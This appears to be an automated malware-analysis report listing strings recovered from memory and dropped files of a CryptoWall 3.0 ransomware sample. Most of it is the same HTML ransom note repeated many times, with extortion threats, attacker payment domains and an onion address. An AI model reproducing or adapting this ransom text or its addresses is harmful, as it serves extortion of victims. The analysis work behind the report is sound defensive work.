steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: notepad.exe, 00000015.00000002.875324829.000000000017E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt48.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt112.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt293.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html113.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html353.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt119.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt382.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt411.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html57.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt327.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html192.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt376.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt155.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html9.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt379.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html247.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html351.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt404.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt303.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html208.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt133.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt146.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
